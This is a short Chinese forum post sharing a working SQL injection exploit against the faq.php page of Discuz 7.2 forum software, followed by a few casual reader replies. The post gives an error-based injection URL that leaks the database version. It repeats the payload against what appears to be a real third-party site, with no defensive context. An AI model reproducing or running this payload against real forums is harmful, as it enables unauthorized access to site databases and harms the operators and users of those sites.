Discuz 7.2 faq.php SQL注入漏洞
EXP:http://www.xxx.com/faq.php?action=grouppermission&gids='&gids=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema
.tables group by x)a)%23
如:
http://www.nichijou.cc/bbs/faq.php?action=grouppermission&gids=%27&gids=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23
小白表示看不懂~ 支持原创求金币打赏:lol o8的水印 logo 还是一如既往的丑掉渣 感谢分享
这个也可以试试,这两天好强大吧